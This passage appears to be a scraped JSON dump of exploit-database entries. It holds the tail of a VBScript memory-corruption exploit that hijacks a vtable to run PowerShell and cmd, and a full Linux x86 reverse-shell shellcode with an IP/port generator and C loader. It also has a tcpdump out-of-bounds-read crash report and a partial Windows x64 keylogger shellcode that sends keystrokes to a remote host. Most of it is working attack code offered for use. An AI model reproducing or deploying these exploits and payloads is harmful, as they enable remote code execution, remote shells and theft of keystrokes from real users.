It writes an arbitrary DWORD to an\r\n' arbitrary location, and sets the subsequent 3 bytes to zero.\r\nSub WriteInt32With3ByteZeroTrailer(addr, val)\r\n\tTriggerWrite addr , (val) AND &hff\r\n\tTriggerWrite addr + 1, (val\\&h100) AND &hff\r\n\tTriggerWrite addr + 2, (val\\&h10000) AND &hff\r\n\tTriggerWrite addr + 3, (val\\&h1000000) AND &hff\r\nEnd Sub\r\nSub WriteAsciiStringWith4ByteZeroTrailer(addr, str)\r\n\tFor i = 0 To Len(str) - 1\r\n\t\tTriggerWrite addr + i, Asc(Mid(str, i + 1, 1))\r\n\tNext\r\nEnd Sub\r\nFunction ReadInt32(addr)\r\n\tWriteInt32With3ByteZeroTrailer addressOfGremlin + &h8, addr\r\n\tReadInt32 = ar1(gremlin)\r\nEnd Function\r\nFunction LeakAddressOfObject(obj)\r\n\tSet ar1(gremlin + 1) = obj\r\n\tLeakAddressOfObject = ReadInt32(addressOfGremlin + &h18)\r\nEnd Function\r\nSub Exploit()\r\n\t' Corrupt vt of one array element (the \"gremlin\")\r\n\tTriggerWrite addressOfGremlin, &h4003\t' VT_BYREF | VT_I4\r\n\tFor i = ((addressOfGremlin - &h20) / &h10) Mod &h100 To UBound(ar1) Step &h100\r\n\t\tIf Not IsEmpty(ar1(i)) Then\r\n\t\t\tgremlin = i\r\n\t\t\tExit For\r\n\t\tEnd If\r\n\tNext\r\n\t\r\n\tIf IsEmpty(gremlin) Then\r\n\t\tMsgBox \"Could not find gremlin\"\r\n\t\tExit Sub\r\n\tEnd If\r\n\t\r\n\tFor i = 0 To UBound(ar2)\r\n\t\tSet ar2(i) = CreateObject(\"Scripting.Dictionary\")\r\n\tNext\r\n\t\r\n\tSet dict = ar2(UBound(ar2) / 2)\r\n\taddressOfDict = LeakAddressOfObject(dict)\r\n\tvtableOfDict = ReadInt32(addressOfDict)\r\n\tscrrun = vtableOfDict - &h11fc\r\n\tkernel32 = ReadInt32(scrrun + &h1f1a4) - &h23c90\r\n\twinExec = kernel32 + &h5d380\r\n\t\r\n\tdict.Exists \"dummy\"\t\t' Make a dispatch call, just to populate pld\r\n\t' Relocate pld to ensure its address doesn't contain a null byte\r\n\tpld = ReadInt32(addressOfDict + &h3c)\r\n\tfakePld = &h28281020\r\n\tFor i = 0 To 3 - 1\r\n\t\tWriteInt32With3ByteZeroTrailer fakePld + 4 * i, ReadInt32(pld + 4 * i)\r\n\tNext\r\n\t\r\n\tfakeVtable = &h28282828\t\t' ASCII \"((((\"\r\n\tFor i = 0 To 
21\r\n\t\tIf i = 12 Then\t\t' Dictionary.Exists\r\n\t\t\tfptr = winExec\r\n\t\tElse\r\n\t\t\tfptr = ReadInt32(vtableOfDict + 4 * i)\r\n\t\tEnd If\r\n\t\tWriteInt32With3ByteZeroTrailer (fakeVtable + 4 * i), fptr\r\n\tNext\r\n\t\r\n\tWriteAsciiStringWith4ByteZeroTrailer addressOfDict, \"((((\\..\\PowerShell.ewe -Command \"\"<#AAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n\tWriteInt32With3ByteZeroTrailer addressOfDict + &h3c, fakePld\r\n\tWriteAsciiStringWith4ByteZeroTrailer addressOfDict + &h40, \"#>$a = \"\"\"\"Start-Process cmd `\"\"\"\"\"\"/t:4f /k whoami /user`\"\"\"\"\"\"\"\"\"\"\"\" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))\"\"\"\r\n\t\r\n\tOn Error Resume Next\r\n\tdict.Exists \"dummy\"\t\t' Wheeee!!\r\n\t\r\n\t' A little cleanup to help prevent crashes after the exploit\r\n\tFor i = 1 To 3\r\n\t\tWriteInt32With3ByteZeroTrailer addressOfDict + &h48 * i, vtableOfDict\r\n\t\tWriteInt32With3ByteZeroTrailer addressOfDict + (&h48 * i) + &h14, 2\r\n\tNext\r\n\tErase Dict\r\n\tErase ar2\r\nEnd Sub\r\nExploit\r\n</script>\r\n</body>\r\n</html>\n\n# 0day.today [2019-05-24] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32801"}, {"lastseen": "2019-05-04T03:50:52", "bulletinFamily": "exploit", "description": "Exploit for linux/x86 platform in category shellcode", "modified": "2019-05-03T00:00:00", "published": "2019-05-03T00:00:00", "id": "1337DAY-ID-32652", "href": "https://0day.today/exploit/description/32652", "title": "Linux/x86 - Reverse Shell Shellcode (91 Bytes) + Python Wrapper", "type": "zdt", "sourceData": "# Exploit Title: Linux/x86 - Reverse Shell Shellcode (91 Bytes) + Python Wrapper\r\n# Exploit Author: Dave Sully \r\n# Vendor Homepage: \r\n# Software Link: NA\r\n# Version: NA\r\n# Tested on: Ubuntu 16.04\r\n# CVE : NA\r\n \r\n#######################################################################\r\n#######################################################################\r\n \r\n# This is the raw assembly \r\n 
\r\n#######################################################################\r\n#######################################################################\r\n \r\n; Filename: reverse_shell.nasm\r\n; Author: Dave Sully\r\n; Website: http://suls.co.uk\r\n; Purpose: Reverse shell in x86 assembly \r\n \r\nglobal _start \r\n \r\nsection .text\r\n_start:\r\n \r\n ; Clear everthing we are using \r\n xor eax, eax \r\n xor ebx, ebx \r\n xor ecx, ecx \r\n xor edx, edx \r\n xor esi, esi\r\n xor edi, edi\r\n \r\n ; Define structure for socket \r\n ; push 0x0100007f ; Push IP to stack in reverse byte order ; need to revist the null bytes here (127.0.0.1)\r\n ; We have a issue here in that the ip address 127.0.0.1 = 0x0100007f in hex which contains null bytes \r\n ; Easiest way around this is to XOR the value with 0xffffffff\r\n mov edi, 0xfeffff80 ; xor of 0x0100007f and 0xffffffff\r\n xor edi, 0xffffffff\r\n push edi\r\n push word 0xb315 ; Push 5555 to the stack in reverse byte order 5555 in hex = 0x15b3 \r\n push word 0x2 ; push 2 to the stack (AF-INET) \r\n \r\n ; Create socket \r\n ; s = socket(AF_INET, SOCK_STREAM, 0)\r\n mov ax, 0x167 ; Syscall 359 (socket)\r\n mov bl, 0x2 ; AF-INET (2) \r\n mov cl, 0x1 ; Sock stream (1) \r\n ; dl should already be zero \r\n int 0x80 ; call system interupt to create socket \r\n xchg esi, eax ; socket file descriptor now stored in esi \r\n \r\n ; Connect socket \r\n ; connect(s, (struct sockaddr *)&addr, sizeof(addr));\r\n mov ax, 0x16a ; Syscall 362 connect \r\n mov ebx, esi ; Move socket file descriptor into ebx \r\n mov ecx, esp ; Point ecx to the top of the stack which has our address structure on it \r\n mov dl, 0x10 ; Size of structure (16)\r\n int 0x80 ; call system interupt to create connect \r\n \r\n ; Dup input output and error file descriptors \r\n ; dup2(s, 0); // Dup2 sycall = 63 \r\n xor eax, eax ; Clear eax \r\n mov ebx, esi ; move socket id to ebx \r\n xor ecx, ecx ; Clear ecx \r\n mov cl, 0x2 ; set ecx to 2 \r\nloop:\r\n mov 
al, 0x3f ; syscall 63 \r\n int 0x80 ; call dup 2 \r\n dec ecx ; decrease ecx by 1 \r\n jns loop ; jump if not signed back to loop, this should cycle 2,1,0\r\n \r\n ; Execute Shell \r\n ; execve(\"/bin/sh\",0 ,0); // Execve syscall = 11\r\n ; (const char *filename, char *const argv[], char *const envp[]);\r\n xor eax,eax ; null eax \r\n mov al, 0xb ; syscall 11 into eax\r\n xor ebx, ebx ; zero ebx \r\n push ebx ; push a null string to the stack to terminate our string \r\n push 0x68732f2f ; hs//\r\n push 0x6e69622f ; nib/\r\n mov ebx, esp ; point ebx at the stack\r\n xor ecx, ecx ; clear ecx and edx as they are used in the syscall \r\n xor edx, edx\r\n int 0x80 \r\n \r\nsection .data\r\n \r\n#######################################################################\r\n#######################################################################\r\n \r\n### Compile and link as follows \r\n \r\nnasm -f elf32 -o reverse_shell.o reverse_shell.nasm \r\ngcc -o reverse_shell reverse_shell.o \r\n \r\n \r\n#######################################################################\r\n#######################################################################\r\n \r\n### To configure IP and port use the following python3 wrapper script \r\n \r\n#######################################################################\r\n#######################################################################\r\n \r\n \r\n#!/usr/bin/env python3 \r\n# File: wrapper.py\r\n# Author: Dave Sully \r\n# Reverse shell wrapper in python3 \r\n# Usage: python3 wrapper.py 192.168.1.1 5000\r\n \r\nimport argparse\r\nimport socket \r\nfrom struct import unpack\r\n \r\nprint(\"\\n*****************************************\")\r\nprint(\"***** Reverse shell wrapper script ******\")\r\nprint(\"*****************************************\")\r\n \r\n# Grab command line args (ip and port) \r\nparser = argparse.ArgumentParser() \r\nparser.add_argument(\"ip\")\r\nparser.add_argument(\"port\")\r\nargs = parser.parse_args() \r\n# check port 
is in a valid range \r\nif ((int(args.port) > 65535) or (int(args.port) < 256)):\r\n print(\"\\nPort number must be between 256 and 65535\\n\")\r\n exit()\r\n \r\n# Xor Function \r\ndef xor_strings(str1,str2):\r\n result = int(str1,16) ^ int(str2,16)\r\n return '{:x}'.format(result)\r\n \r\n# Process IP address\r\nprint(\"\\nIP address: \"+ args.ip)\r\n# Convert IP to Hex \r\nhexip = socket.inet_aton(args.ip).hex() \r\nprint(\"Hex IP Address: \"+hexip)\r\n# Reverse the hex String \r\nrevhexip = hexip[6:8]\r\nrevhexip = revhexip + hexip[4:6]\r\nrevhexip = revhexip + hexip[2:4]\r\nrevhexip = revhexip + hexip[0:2]\r\n# Xor the reversed hex address as the shellcode XORs this address to avoid null bytes \r\nxored_ip = xor_strings(revhexip,\"FFFFFFFF\")\r\nprint(\"XORed reverse hex IP Address: \"+ xored_ip) \r\n \r\n# Process Port\r\nprint(\"\\nPort: \"+args.port)\r\n# Convert Port to hex \r\nhexport = hex(int(args.port)).replace('0x','')\r\nif len(hexport)<4:\r\n hexport = '0'+hexport\r\nprint(\"Hex Port: \"+hexport)\r\nrevhexport = hexport[2:4]+ hexport[0:2] \r\nprint(\"Reverse Hex Port: \"+revhexport)\r\n \r\n# Check for null bytes \r\nif (xored_ip[0:2]==\"00\" or \r\n xored_ip[2:4]==\"00\" or \r\n xored_ip[4:6]==\"00\" or \r\n xored_ip[6:8]==\"00\" or \r\n revhexport[0:2]==\"00\" or \r\n revhexport[2:4]==\"00\"):\r\n print(\"\\n** WARNING ** Null Bytes detected in Xored IP or port shellcode,\")\r\n print(\"shellcode may not work !\\n\")\r\n \r\n# Construct Shellcode \r\nshellcode= \\\r\n\"\\\\x31\\\\xc0\\\\x31\\\\xdb\\\\x31\\\\xc9\\\\x31\\\\xd2\\\\x31\\\\xf6\\\\x31\\\\xff\\\\xbf\" + \\\r\n \"\\\\x\"+ xored_ip[6:8] + \\\r\n \"\\\\x\"+ xored_ip[4:6] + \\\r\n \"\\\\x\"+ xored_ip[2:4] + \\\r\n \"\\\\x\"+ xored_ip[0:2] + \\\r\n\"\\\\x83\\\\xf7\\\\xff\\\\x57\\\\x66\\\\x68\" + \\\r\n \"\\\\x\"+ revhexport[2:4] + \\\r\n \"\\\\x\"+ revhexport[0:2] + \\\r\n\"\\\\x66\\\\x6a\\\\x02\\\\x66\\\\xb8\\\\x67\\\\x01\\\\xb3\\\\x02\\\\xb1\\\\x01\\\\xcd\\\\x80\\\\x96\\\\x66\" + 
\\\r\n\"\\\\xb8\\\\x6a\\\\x01\\\\x89\\\\xf3\\\\x89\\\\xe1\\\\xb2\\\\x10\\\\xcd\\\\x80\\\\x31\\\\xc0\\\\x89\\\\xf3\" + \\\r\n\"\\\\x31\\\\xc9\\\\xb1\\\\x02\\\\xb0\\\\x3f\\\\xcd\\\\x80\\\\x49\\\\x79\\\\xf9\\\\x31\\\\xc0\\\\xb0\\\\x0b\" + \\\r\n\"\\\\x31\\\\xdb\\\\x53\\\\x68\\\\x2f\\\\x2f\\\\x73\\\\x68\\\\x68\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x89\\\\xe3\" + \\\r\n\"\\\\x31\\\\xc9\\\\x31\\\\xd2\\\\xcd\\\\x80\"\r\n# Output Shellcode \r\nprint(\"\\nShellcode (Length 91 Bytes): \\n\")\r\nprint(shellcode+\"\\n\")\r\n \r\n#######################################################################\r\n#######################################################################\r\n \r\n# Example output\r\n \r\n*****************************************\r\n***** Reverse shell wrapper script ******\r\n*****************************************\r\n \r\nIP address: 127.0.0.1\r\nHex IP Address: 7f000001\r\nXORed reverse hex IP Address: feffff80\r\n \r\nPort: 8080\r\nHex Port: 1f90\r\nReverse Hex Port: 901f\r\n \r\nShellcode (Length 91 Bytes): \r\n \r\n\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2\\x31\\xf6\\x31\\xff\\xbf\\x80\\xff\\xff\\xfe\\x83\\xf7\\xff\\x57\\x66\\x68\\x1f\\x90\\x66\\x6a\\x02\\x66\\xb8\\x67\\x01\\xb3\\x02\\xb1\\x01\\xcd\\x80\\x96\\x66\\xb8\\x6a\\x01\\x89\\xf3\\x89\\xe1\\xb2\\x10\\xcd\\x80\\x31\\xc0\\x89\\xf3\\x31\\xc9\\xb1\\x02\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x31\\xc0\\xb0\\x0b\\x31\\xdb\\x53\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xcd\\x80\r\n \r\n \r\n#######################################################################\r\n#######################################################################\r\n \r\n# To compile shellcode from the wrapper script use the following C program \r\n# Replacing the shellcode with the wrapper script shellcode output\r\n \r\n#######################################################################\r\n#######################################################################\r\n \r\n// Filename: 
shellcode.c\r\n#include<stdio.h>\r\n#include<string.h>\r\n \r\nunsigned char code[] = \\\r\n\"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2\\x31\\xf6\\x31\\xff\\xbf\\x80\\xff\\xff\\xfe\\x83\\xf7\\xff\\x57\\x66\\x68\\x1f\\x90\\x66\\x6a\\x02\\x66\\xb8\\x67\\x01\\xb3\\x02\\xb1\\x01\\xcd\\x80\\x96\\x66\\xb8\\x6a\\x01\\x89\\xf3\\x89\\xe1\\xb2\\x10\\xcd\\x80\\x31\\xc0\\x89\\xf3\\x31\\xc9\\xb1\\x02\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x31\\xc0\\xb0\\x0b\\x31\\xdb\\x53\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xcd\\x80\";\r\n \r\nmain()\r\n{\r\n printf(\"Shellcode Length: %d\\n\", strlen(code));\r\n int (*ret)() = (int(*)())code;\r\n ret();\r\n}\r\n \r\n#######################################################################\r\n#######################################################################\r\n \r\n# Compile with \r\n \r\ngcc -fno-stack-protector -z execstack -o shellcode shellcode.c\n\n# 0day.today [2019-05-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32652"}, {"lastseen": "2019-03-05T02:18:45", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2019-03-02T00:00:00", "published": "2019-03-02T00:00:00", "id": "1337DAY-ID-32287", "href": "https://0day.today/exploit/description/32287", "title": "tcpdump < 4.9.3 - Multiple Heap-Based Out-of-Bounds Reads Exploit", "type": "zdt", "sourceData": "tcpdump < 4.9.3 - Multiple Heap-Based Out-of-Bounds Reads Exploit\r\n\r\nThrough fuzzing of network capture .pcap files, we have identified 16 crashes with unique stack traces in tcpdump. 
These crashes are caused by heap-based out-of-bounds memory reads, and can be reproduced with the latest tcpdump source code from GitHub, compiled with AddressSanitizer:\r\n\r\n--- cut ---\r\n$ ./tcpdump --version\r\ntcpdump version 4.10.0-PRE-GIT\r\nlibpcap version 1.10.0-PRE-GIT (with TPACKET_V3)\r\nOpenSSL 1.1.0h 27 Mar 2018\r\nCompiled with AddressSanitizer/CLang.\r\n--- cut ---\r\n\r\nThe command line options we used are as follows:\r\n\r\n--- cut ---\r\n$ ./tcpdump -e -XX -vvv -R $file\r\n--- cut ---\r\n\r\nA summary of each crash with the two top-level callstack items are shown below:\r\n\r\n+----------------------------------+-------------------------------------------------------------------------+\r\n| Id | Top of stack trace |\r\n+----------------------------------+-------------------------------------------------------------------------+\r\n| 0c7293c683364afcf4d60f10fa296429 | #0 0x55fdd6 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |\r\n| | #1 0x55f43c in mfr_print tcpdump/./print-fr.c:498:17 |\r\n| 1092c136071deb2f21ddcde498353dfc | #0 0x773fb6 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |\r\n| | #1 0x774b8a in lmp_print_data_link_subobjs tcpdump/./print-lmp.c:411:6 |\r\n| 472984168e31d86fcc3a2cf9b5ac1ddc | #0 0x7c5666 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |\r\n| | #1 0x7e440e in rx_cache_find tcpdump/./print-rx.c:735:27 |\r\n| 55dca8197d3a7e5900df99c60db2821a | #0 0x73b2cb in rpl_printopts tcpdump/./print-icmp6.c:824:27 |\r\n| | #1 0x73af8b in rpl_daoack_print tcpdump/./print-icmp6.c:952:17 |\r\n| 5966513c685d91c5dc5edb42e5191ed4 | #0 0x7b975b in print_attr_vector64 tcpdump/./print-radius.c:1044:4 |\r\n| | #1 0x7b349e in radius_attrs_print tcpdump/./print-radius.c:1199:18 |\r\n| 5ef0457a44194a7e0fb1f1fa9c2d538c | #0 0x744b26 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |\r\n| | #1 0x74ff59 in ikev1_n_print tcpdump/./print-isakmp.c:1766:4 |\r\n| 6535c4a7b0942711db1a5570bf428576 | #0 0x729f56 in EXTRACT_BE_U_2 tcpdump/./extract.h:86:26 |\r\n| | #1 
0x72835f in icmp_print tcpdump/./print-icmp.c:573:25 |\r\n| 6d3d893a2bc2d8d50cd9386737f1a3f1 | #0 0x773fb6 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |\r\n| | #1 0x774881 in lmp_print_data_link_subobjs tcpdump/./print-lmp.c:403:13 |\r\n| 7efd0ef3a3602ffba4d429f2beaf8489 | #0 0x5d1486 in EXTRACT_BE_U_2 tcpdump/./extract.h:86:26 |\r\n| | #1 0x5d3ab7 in ospf6_print_lshdr tcpdump/./print-ospf6.c:394:2 |\r\n| 8e933ef7fdb3b248cffd2cc432ddfe0e | #0 0x5d1486 in EXTRACT_BE_U_2 tcpdump/./extract.h:86:26 |\r\n| | #1 0x5d3ab7 in ospf6_print_lshdr tcpdump/./print-ospf6.c:394:2 |\r\n| 9a16cc309f6e8c57587f6cfc19ad15e0 | #0 0x773fb6 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |\r\n| | #1 0x774881 in lmp_print_data_link_subobjs tcpdump/./print-lmp.c:403:13 |\r\n| ab10aa7f73ff686440d2d40a174bf801 | #0 0x651a86 in EXTRACT_BE_U_2 tcpdump/./extract.h:86:26 |\r\n| | #1 0x651264 in vrrp_print tcpdump/./print-vrrp.c:155:5 |\r\n| b388f74a9f892fb85d750dd0e32efce1 | #0 0x60d676 in EXTRACT_BE_U_4 tcpdump/./extract.h:98:26 |\r\n| | #1 0x60ad3a in rsvp_obj_print tcpdump/./print-rsvp.c:1581:17 |\r\n| d203c6b47e3cbdf814ad3769589b3628 | #0 0x4bdf60 in __asan_memcpy (tcpdump/tcpdump+0x4bdf60) |\r\n| | #1 0x682088 in ip6addr_string tcpdump/./addrtoname.c:359:2 |\r\n| ec26a95bd915adce3527d4e8152eea84 | #0 0x7ba077 in EXTRACT_BE_U_8 tcpdump/./extract.h:111:20 |\r\n| | #1 0x7b97f5 in print_attr_vector64 tcpdump/./print-radius.c:1046:17 |\r\n| f7fc9a6bc515585b470f8b9c2d2729d7 | #0 0x651a86 in EXTRACT_BE_U_2 tcpdump/./extract.h:86:26 |\r\n| | #1 0x650f19 in vrrp_print tcpdump/./print-vrrp.c:147:5 |\r\n+----------------------------------+-------------------------------------------------------------------------+\r\n\r\nAttached is a ZIP archive containing up to three input samples per each crash, together with the corresponding ASAN logs.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46476.zip\n\n# 0day.today [2019-03-05] #", "cvss": 
{"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32287"}, {"lastseen": "2018-10-30T22:40:07", "bulletinFamily": "exploit", "description": "Exploit for win64 platform in category shellcode", "modified": "2018-10-30T00:00:00", "published": "2018-10-30T00:00:00", "id": "1337DAY-ID-31462", "href": "https://0day.today/exploit/description/31462", "title": "Windows/x64 - Remote (Bind TCP) Keylogger Shellcode (Generator) 864 bytes", "type": "zdt", "sourceData": "/*\r\n \r\n # Title : Windows x64 Remote Keylogger (UDP)\r\n # size : 864 bytes\r\n # Author : Roziul Hasan Khan Shifat\r\n # Tested On : Windows 10 x64 pro\r\n # Date : 26-10-2018\r\n # Email: [email\u00a0protected]\r\n \r\n*/\r\n \r\n \r\n \r\n/*\r\n \r\n \r\nkeyl.obj: file format pe-x86-64\r\n \r\n \r\nDisassembly of section .text:\r\n \r\n0000000000000000 <_start>:\r\n 0: eb 1d jmp 1f <p1>\r\n \r\n0000000000000002 <_init_>:\r\n 2: 48 31 d2 xor rdx,rdx\r\n 5: 65 48 8b 42 60 mov rax,QWORD PTR gs:[rdx+0x60]\r\n a: 48 8b 40 18 mov rax,QWORD PTR [rax+0x18]\r\n e: 48 8b 40 20 mov rax,QWORD PTR [rax+0x20]\r\n 12: 48 8b 30 mov rsi,QWORD PTR [rax]\r\n 15: 48 8b 06 mov rax,QWORD PTR [rsi]\r\n 18: 48 8b 70 20 mov rsi,QWORD PTR [rax+0x20]\r\n 1c: 5b pop rbx\r\n 1d: 53 push rbx\r\n 1e: c3 ret \r\n \r\n000000000000001f <p1>:\r\n 1f: e8 de ff ff ff call 2 <_init_>\r\n \r\n0000000000000024 <_p2_>:\r\n 24: 52 push rdx\r\n 25: 52 push rdx\r\n 26: 4c 8d 3c 24 lea r15,[rsp]\r\n 2a: 48 83 ec 38 sub rsp,0x38\r\n 2e: 4c 8d 24 24 lea r12,[rsp]\r\n 32: 48 83 ec 58 sub rsp,0x58\r\n 36: 48 8d 3c 24 lea rdi,[rsp]\r\n 3a: 41 57 push r15\r\n 3c: 41 54 push r12\r\n 3e: 57 push rdi\r\n 3f: 48 b8 48 45 52 45 49 movabs rax,0x5349544945524548\r\n 46: 54 49 53 \r\n 49: 50 push rax\r\n 4a: 48 31 c0 xor rax,rax\r\n 4d: 66 b8 cc 01 mov ax,0x1cc\r\n 51: 48 01 c3 add rbx,rax\r\n 54: 53 push rbx\r\n 55: 48 89 f1 mov rcx,rsi\r\n 58: 48 8d 93 6e ff ff ff lea rdx,[rbx-0x92]\r\n 5f: 4d 31 c0 xor r8,r8\r\n 62: 41 b0 02 mov 
r8b,0x2\r\n 65: 49 89 f9 mov r9,rdi\r\n 68: ff d3 call rbx\r\n 6a: 41 5d pop r13\r\n 6c: 48 31 c0 xor rax,rax\r\n 6f: 50 push rax\r\n 70: 50 push rax\r\n 71: 48 b8 77 73 32 5f 33 movabs rax,0x642e32335f327377\r\n 78: 32 2e 64 \r\n 7b: 48 89 04 24 mov QWORD PTR [rsp],rax\r\n 7f: 66 c7 44 24 08 6c 6c mov WORD PTR [rsp+0x8],0x6c6c\r\n 86: 48 8d 0c 24 lea rcx,[rsp]\r\n 8a: 48 8b 77 08 mov rsi,QWORD PTR [rdi+0x8]\r\n 8e: 48 83 ec 28 sub rsp,0x28\r\n 92: ff d6 call rsi\r\n 94: 48 96 xchg rsi,rax\r\n 96: 48 8d 4c 24 28 lea rcx,[rsp+0x28]\r\n 9b: c7 01 75 73 65 72 mov DWORD PTR [rcx],0x72657375\r\n a1: ff d0 call rax\r\n a3: 48 89 c1 mov rcx,rax\r\n a6: 49 8d 55 8c lea rdx,[r13-0x74]\r\n aa: 4d 31 c0 xor r8,r8\r\n ad: 41 b0 06 mov r8b,0x6\r\n b0: 4c 8d 4f 10 lea r9,[rdi+0x10]\r\n b4: 41 ff d5 call r13\r\n b7: 48 89 f1 mov rcx,rsi\r\n ba: 49 8d 55 e7 lea rdx,[r13-0x19]\r\n be: 4d 31 c0 xor r8,r8\r\n c1: 41 b0 03 mov r8b,0x3\r\n c4: 4c 8d 4f 40 lea r9,[rdi+0x40]\r\n c8: 41 ff d5 call r13\r\n cb: 48 83 c4 38 add rsp,0x38\r\n \r\n00000000000000cf <_p3_>:\r\n cf: 48 31 c9 xor rcx,rcx\r\n d2: 66 b9 98 01 mov cx,0x198\r\n d6: 48 29 cc sub rsp,rcx\r\n d9: 48 83 c1 6a add rcx,0x6a\r\n dd: 48 8d 14 24 lea rdx,[rsp]\r\n e1: 48 8b 5f 40 mov rbx,QWORD PTR [rdi+0x40]\r\n e5: ff d3 call rbx\r\n e7: 48 31 c9 xor rcx,rcx\r\n ea: b1 02 mov cl,0x2\r\n ec: 51 push rcx\r\n ed: 51 push rcx\r\n ee: 5a pop rdx\r\n ef: 41 58 pop r8\r\n f1: 41 b0 11 mov r8b,0x11\r\n f4: 48 8b 5f 48 mov rbx,QWORD PTR [rdi+0x48]\r\n f8: ff d3 call rbx\r\n fa: 48 89 47 08 mov QWORD PTR [rdi+0x8],rax\r\n fe: 48 8b 1f mov rbx,QWORD PTR [rdi]\r\n 101: 48 31 c9 xor rcx,rcx\r\n 104: ff d3 call rbx\r\n 106: 41 c6 07 02 mov BYTE PTR [r15],0x2\r\n 10a: 66 41 c7 47 02 db 83 mov WORD PTR [r15+0x2],0x83db\r\n 111: 41 c7 47 04 c1 a1 c1 mov DWORD PTR [r15+0x4],0x63c1a1c1\r\n 118: 63 \r\n 119: 4d 31 c9 xor r9,r9\r\n 11c: 41 51 push r9\r\n 11e: 41 51 push r9\r\n 120: 59 pop rcx\r\n 121: 5a pop rdx\r\n 122: b1 0d mov cl,0xd\r\n 124: 
49 89 c0 mov r8,rax\r\n 127: b2 bc mov dl,0xbc\r\n 129: 4c 01 ea add rdx,r13\r\n 12c: 48 8b 5f 10 mov rbx,QWORD PTR [rdi+0x10]\r\n 130: ff d3 call rbx\r\n \r\n0000000000000132 <_p4_>:\r\n 132: 49 8d 4c 24 08 lea rcx,[r12+0x8]\r\n 137: 48 31 d2 xor rdx,rdx\r\n 13a: 52 push rdx\r\n 13b: 52 push rdx\r\n 13c: 41 58 pop r8\r\n 13e: 41 59 pop r9\r\n 140: 48 8b 5f 28 mov rbx,QWORD PTR [rdi+0x28]\r\n 144: ff d3 call rbx\r\n 146: 49 8d 4c 24 08 lea rcx,[r12+0x8]\r\n 14b: 48 8b 5f 30 mov rbx,QWORD PTR [rdi+0x30]\r\n 14f: ff d3 call rbx\r\n 151: 49 8d 4c 24 08 lea rcx,[r12+0x8]\r\n 156: 48 8b 5f 38 mov rbx,QWORD PTR [rdi+0x38]\r\n 15a: ff d3 call rbx\r\n 15c: eb d4 jmp 132 <_p4_>\r\n \r\n000000000000015e <kernel32_func>:\r\n 15e: 47 rex.RXB\r\n 15f: 65 74 4d gs je 1af <user32_func+0x33>\r\n 162: 6f outs dx,DWORD PTR ds:[rsi]\r\n 163: 64 75 6c fs jne 1d2 <user32_func+0x56>\r\n 166: 65 48 61 gs rex.W (bad) \r\n 169: 6e outs dx,BYTE PTR ds:[rsi]\r\n 16a: 64 6c fs ins BYTE PTR es:[rdi],dx\r\n 16c: 65 41 01 4c 6f 61 add DWORD PTR gs:[r15+rbp*2+0x61],ecx\r\n 172: 64 4c 69 62 72 61 72 imul r12,QWORD PTR fs:[rdx+0x72],0x41797261\r\n 179: 79 41 \r\n 17b: 01 53 65 add DWORD PTR [rbx+0x65],edx\r\n \r\n000000000000017c <user32_func>:\r\n 17c: 53 push rbx\r\n 17d: 65 74 57 gs je 1d7 <ws2_32_func>\r\n 180: 69 6e 64 6f 77 73 48 imul ebp,DWORD PTR [rsi+0x64],0x4873776f\r\n 187: 6f outs dx,DWORD PTR ds:[rsi]\r\n 188: 6f outs dx,DWORD PTR ds:[rsi]\r\n 189: 6b 45 78 41 imul eax,DWORD PTR [rbp+0x78],0x41\r\n 18d: 01 43 61 add DWORD PTR [rbx+0x61],eax\r\n 190: 6c ins BYTE PTR es:[rdi],dx\r\n 191: 6c ins BYTE PTR es:[rdi],dx\r\n 192: 4e rex.WRX\r\n 193: 65 78 74 gs js 20a <get_addr+0x1a>\r\n 196: 48 6f rex.W outs dx,DWORD PTR ds:[rsi]\r\n 198: 6f outs dx,DWORD PTR ds:[rsi]\r\n 199: 6b 45 78 01 imul eax,DWORD PTR [rbp+0x78],0x1\r\n 19d: 47 rex.RXB\r\n 19e: 65 74 4b gs je 1ec <ws2_32_func+0x15>\r\n 1a1: 65 79 53 gs jns 1f7 <get_addr+0x7>\r\n 1a4: 74 61 je 207 <get_addr+0x17>\r\n 1a6: 74 65 je 20d 
